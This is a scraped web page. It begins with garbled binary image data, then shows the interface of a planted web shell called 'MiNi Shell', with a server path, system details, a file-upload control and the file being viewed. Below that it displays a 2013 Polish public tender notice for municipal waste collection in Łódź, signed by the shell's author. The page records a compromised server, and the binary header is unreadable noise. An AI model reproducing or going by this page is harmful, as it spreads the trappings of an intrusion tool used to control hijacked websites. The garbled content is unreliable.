JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130212/22355-N-2013.html

<p class="kh_header"><b>Łódź: Wywóz odpadów komunalnych z administrowanych nieruchomości</b><br>
<b>Numer ogłoszenia: 22355 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 6847601, faks 42 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wschod.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz odpadów komunalnych z administrowanych nieruchomości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający działając w oparciu o: wytyczne zawarte w Regulaminie utrzymania czystości i 
     porządku na terenie Miasta Łodzi: 
      -  Uchwały Nr LXII/1159/06 Rady Miejskiej w Łodzi z dnia 01.02.2006 r. z późniejszymi 
          zmianami, W sprawie wprowadzenia Regulaminu utrzymania czystości i porządku na 
          terenie Miasta Łodzi; 
-   Uchwały Nr V/44/10 Rady Miejskiej w Łodzi z dnia 29.12.2010 r., zmieniającej Uchwałę, 
    W sprawie określenia górnych stawek opłat ponoszonych przez właścicieli  nieruchomości 
     za usługę pozbycia się zebranych na terenie nieruchomości odpadów komunalnych oraz 
     nieczystości ciekłych; 
    zaprasza do złożenia ofert w postępowaniu na usługi w zakresie: wywozu odpadów  
    komunalnych z uwzględnieniem selektywnej zbiórki odpadów z nieruchomości  będących 
    własnością: Gminy, Skarbu Państwa oraz współwłasnych z udziałem Gminy lub Skarbu 
    Państwa  powyżej 50 % znajdujących się na terenie dzielnicy Łódź - Górna 
    administrowanych przez Zamawiającego w następujących ilościach:
    a) odpady (mokre bio):  ok. 363,00  m3,
    b) odpady różne, mające wartość surowcową (szkło, plastik, papier): ok. 620,50  m3,
    c) odpady mieszane:  ok. 2 668,00  m3,
    d) odpady (popiół i żużel): ok. 54,00  m3.     

2. Przedmiotem zamówienia jest:
a) bezpłatne dostarczenie i ustawienie w miejscach wyznaczonych przez  Zamawiającego na 
     nieruchomościach oznakowanych pojemników do selektywnej zbiórki odpadów komunalnych 
     pochodzących z gospodarstw domowych:  
   - na odpady różne,  mające wartość surowcową (szkło, plastik, papier),
   - na odpady mieszane,
   - na odpady popiół i żużel,     
     w ilości oraz pojemności odpowiadającej potrzebom ujętym w wykazie stanowiącym załącznik nr 1   
     do SIWZ,  tj:
   - odpady różne, mające wartość surowcową (szkło, plastik, papier)- pojemniki PCV:
       0,12 m3 - 72 szt., 
       0,24 m3 - 60 szt., 
       1,10 m3 - 8 szt.,
       2,50 m3 (typ IGLO) - 7 szt., 
   - odpady mieszane - pojemniki PCV:
       0,12 m3 - 55 szt.,
       0,24 m3 - 82 szt.,
       1,10 m3 - 76 szt., 
   - odpady: popiół, żużel - pojemniki metalowe:
  0,11 m3 - 163 szt.,
   - odpady (mokre bio) - nie dotyczy dostarczenia pojemników na odpady ulegające biodegradacji - 
      pojemniki są własnością Gminy we władaniu Zamawiającego i zostały ustawione przez 
     Zamawiającego na nieruchomościach,w miejscach wyznaczonych.
b) opróżnianie ustawionych pojemników z częstotliowścią i systematycznością zgodnie z ustalonym 
    harmonogramem ujętym w wykazie stanowiącym załącznik  nr 1 do SIWZ, a także dodatkowe 
    opróżnianie pojemników nie objęte harmonogramem, w przypadkach nasilenia prac porządkowych 
    przez najemców nieruchomości - na podstawie pisemnego zgłoszenia Zamawiającego z jego 
    realizacją w dniu następnym po zgłoszeniu,  
c) utrzymanie w należytej czystości miejsc ustawienia pojemników oraz miejsc ulegających 
    zaśmieceniu powstałych w wyniku opróżniania pojemników,
d) ustawianie opróżnianych pojemników w miejscach do tego wyznaczonych,
e) utrzymywanie używanych pojemników w odpowiednim stanie technicznym gwarantującym 
    bezpieczeństwo ich użytkowania (natychmiastowa wymiana uszkodzonych pojemników),
f) bezpłatne uzupełnianie brakujących pojemników na odpady komunalne w wyniku zaboru mienia 
    przez osoby trzecie - kradzież.
g) przeprowadzanie dezynfekcji ustawionych pojemników z częstotliwoscią gwarantującą utrzymanie 
    w należytym stanie sanitarnym - co najmniej jeden raz na kwartał, a  w okresie od m-ca maja do 
    m-ca września co najmniej jeden raz w  miesiącu,
h) wywóz odpadów wielkogabarytowych złożonych przez mieszkańców w miejscach ustawienia 
    pojemników bez konieczności pisemnego bądź telefonicznego zgłoszenia Zamawiającego 
    (monitoring Wykonawcy) - bez dodatkowych opłat,
 i) zapewnienie opróżniania pojemników także w przypadkach utrudnień spowodowanych robotami 
    drogowymi.
3. Wszystkie czynności wymienione w ust. 3 wykonywane będą w ramach wynagrodzenia 
    ryczałtowego Wykonawcy, za wywóz 1 m3  odpadów komunalnych z uwzględnieniem selektywnej 
    zbiórki odpadów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu określonego 
    w art. 22 ust. 1 Ustawy,  który dotyczy: 
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy 
    prawa nakładają obowiązek ich posiadania,
    Zamawiający żąda od Wykonawcy, posiadania stosownych zezwoleń uprawniających do 
    świadczenia usługi w zakresie: wywozu odpadów komunalnych uwzględniających selektywną 
    zbiórkę odpadów z zachowaniem odpowiednich przepisów dotyczących ochrony środowiska wraz 
    ze stosownymi umowami zawartymi ze składowiskami odpadów.  
    Ocena spełnienia opisanego warunku  nastąpi na podstawie dokumentów  złożonych  przez 
    Wykonawcę, na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu, określonego  
    w art. 22 ust. 1 Ustawy,  który dotyczy:
a) posiadania wiedzy i doświadczenia,
    Zamawiający żąda od Wykonawcy, wykazania w zał. nr 3 do SIWZ  wykonanych i 
    wykonywanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli 
    okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem usługom 
    stanowiącym przedmiot zamówienia  z  podaniem ich wartości, przedmiotu, dat wykonania i 
    odbiorców,  oraz  załączeniem dokumentów potwierdzajacych, że wykazane w załączniku usługi 
    zostały wykonane lub są wykonywane należycie, (co najmniej jednej usługi  zrealizowanej w 
    okresie 12 miesięcy na kwotę: min. 100 000,00 zł. brutto). 
    Ocena spełnienia opisanego warunku  nastąpi na podstawie dokumentów i oświadczeń 
    złożonych  przez Wykonawcę, na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu, określonego  
    w art. 22 ust. 1 Ustawy,  który dotyczy:
a) dysponowania potencjałem technicznym,
     Zamawiający żąda od Wykonawcy, wykazania w zał. nr 4 do SIWZ  posiadanych 
     specjalistycznych środków transportu typu śmieciarki o wydajności zapewniającej maksymalny 
     jednorazowy wywóz odpadów komunalnych na dany dzień tygodnia w oparciu o przedstawione w 
     załączniku nr 1 do SIWZ zestawienie ilości pojemników na odpady oraz  specjalistycznych 
     środków transportu przeznaczonych do dezynfekcji pojemników a, także ilości posiadanych 
     pojemników na odpady komunalne uwzględniających selektywną zbiórkę odpadów w ilości nie 
     mniejszej  niż: 
  - odpady różne (mające wartość surowcową) -  pojemniki PCV:
     0,12 m3 - 72 szt.
     0,24 m3 - 60 szt.
     1,10 m3 -   8 szt.,
     2,50 m3 (typ IGLOO) - 7 szt. 
  - odpady  mieszane - pojemniki PCV:
      0,12 m3 - 55 szt.
      0,24 m3 - 82 szt.
      1,10 m3 - 76 szt. 
  - odpady (popiół, żużel) - pojemniki metalowe:
      0,11 m3 - 163 szt.
    Ocena spełnienia opisanego warunku  nastąpi na podstawie dokumentów złożonych  przez 
    Wykonawcę, na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W celu potwierdzenia przez Wykonawcę spełnienia warunku udziału w postępowaniu, określonego  
     w art. 22 ust. 1 Ustawy,  który dotyczy:
a) sytuacji ekonomicznej i finansowej,
    Zamawiający żąda od Wykonawcy,  posiadania ubezpieczenia od odpowiedzialności cywilnej w 
    zakresie: prowadzonej działalności związanej z wywozem odpadów komunalnych na sumę 
    ubezpieczenia nie mniej niż 200 000,00 zł. 
   Ocena spełnienia opisanego warunku  nastąpi na podstawie dokumentów  i oświadczeń 
    złożonych  przez Wykonawcę, na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wschod.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> A.N. Łódź - Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, pokój 4, w cenie 20,00 zł. (brutto).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 10:00, miejsce: A.N. Łódź - Górna Wschód, 93-129 Łódź, ul. Lubelska 9/11, pokój 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com